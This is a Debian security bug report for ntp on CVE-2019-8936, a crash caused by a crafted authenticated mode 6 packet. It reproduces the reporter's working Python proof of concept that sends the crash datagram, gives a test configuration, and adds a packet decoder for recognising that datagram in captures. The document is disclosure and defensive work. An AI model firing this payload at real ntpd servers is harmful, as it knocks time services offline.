Source: ntp
Version: 1:4.2.8p12+dfsg-3
Severity: important
Tags: security upstream
Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565
Hi,
The following vulnerability was published for ntp.
CVE-2019-8936[0]:
Crafted null dereference attack in authenticated mode 6 packet
If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.
To verify/illustrate the issue/fix one can use the following as
provided by the reporter in the upstream report:
#!/usr/bin/env python
import sys
import socket
# Mail wrapping split the assignment; bytes literals keep the payload unchanged.
buf = (b"\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
       b"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
       b"\x56\xc8\x07\xd4")
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(buf, ('127.0.0.1', 123))
and running ntpd under valgrind as
valgrind ntpd -n -c ~/resources/ntp.conf
with ntp.conf:
logfile /tmp/ntp.log
restrict 127.0.0.1
keys /path/to/keys
trustedkey 1
controlkey 1
requestkey 1
and keys
1 M gurka
2 M agurk
For further information see:
[0] https://security-tracker.debian.org/tracker/CVE-2019-8936
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936
[1] http://bugs.ntp.org/show_bug.cgi?id=3565
[2] http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ
Please adjust the affected versions in the BTS as needed.
Regards,
Salvatore
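
Added example, not part of the original report or of ntpd: a decoder for the mode 6 (control) header, using the field layout from RFC 9327, applied to the 36-byte datagram quoted above so the same shape can be recognised in a packet capture. The function names and the triage rule are assumptions made for this illustration.

```python
import struct

# Subset of NTP control (mode 6) opcodes as listed in RFC 9327.
OPCODES = {1: "read status", 2: "read variables", 3: "write variables",
           4: "read clock variables", 5: "write clock variables",
           6: "set trap", 7: "trap response", 31: "unset trap"}
HEADER = struct.Struct("!BBHHHHH")  # 12 bytes: flags, opcode, seq, status, assoc, offset, count

# The datagram from the report above, as bytes.
REPORT_PACKET = (
    b"\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70"
    b"\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5"
    b"\x56\xc8\x07\xd4")


def parse_mode6(pkt):
    """Decode a mode 6 datagram into a dict; return None for any other mode."""
    if len(pkt) < HEADER.size:
        return None
    b0, b1, seq, status, assoc, offset, count = HEADER.unpack_from(pkt)
    if b0 & 0x07 != 6:
        return None
    data_end = HEADER.size + ((count + 3) & ~3)  # data is padded to 32 bits
    if data_end > len(pkt):
        raise ValueError("count field exceeds datagram length")
    auth = pkt[data_end:]  # optional authenticator: 4-byte key id + digest
    has_mac = len(auth) >= 4 + 16
    return {
        "version": (b0 >> 3) & 0x07,
        "response": bool(b1 & 0x80),
        "opcode": b1 & 0x1F,
        "opcode_name": OPCODES.get(b1 & 0x1F, "other"),
        "sequence": seq, "status": status, "association_id": assoc,
        "offset": offset, "count": count,
        "data": pkt[HEADER.size:HEADER.size + count],
        "key_id": struct.unpack_from("!I", auth)[0] if has_mac else None,
        "mac_len": len(auth) - 4 if has_mac else 0,
    }


def is_authenticated_request(info):
    """Hypothetical triage rule: a mode 6 request that carries a key id and MAC."""
    return info is not None and not info["response"] and info["key_id"] is not None


if __name__ == "__main__":
    decoded = parse_mode6(REPORT_PACKET)
    print(decoded, is_authenticated_request(decoded))
```

Decoded, the datagram is a version 2 "write variables" request naming the variable "leap", authenticated with key id 1 and a 16-byte MAC, which matches the controlkey 1 setting in the ntp.conf shown in the report.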